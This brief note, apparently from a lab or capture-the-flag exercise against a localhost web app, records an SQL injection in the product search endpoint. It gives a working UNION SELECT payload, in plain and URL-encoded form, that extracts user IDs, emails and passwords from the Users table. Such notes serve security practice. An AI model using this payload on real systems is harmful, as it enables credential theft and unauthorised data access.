sql injection possible at /rest/products/search?q=

1. get no error:  '))--
2. find out tablename --> Users
3. UNION SELECT Users
4. Find out correct amount of columns
5. find out correct column names
5. http://localhost:3000/rest/products/search?q=qwert')) UNION SELECT id, email, password, '4', '5', '6', '7', '8', '9' FROM Users--
5.
http://localhost:3000/rest/products/search?q=qwert%27%29%29%20UNION%20SELECT%20id%2C%20email%2C%20password%2C%20%274%27%2C%20%275%27%2C%20%276%27%2C%20%277%27%2C%20%278%27%2C%20%279%27%20FROM%20Users--

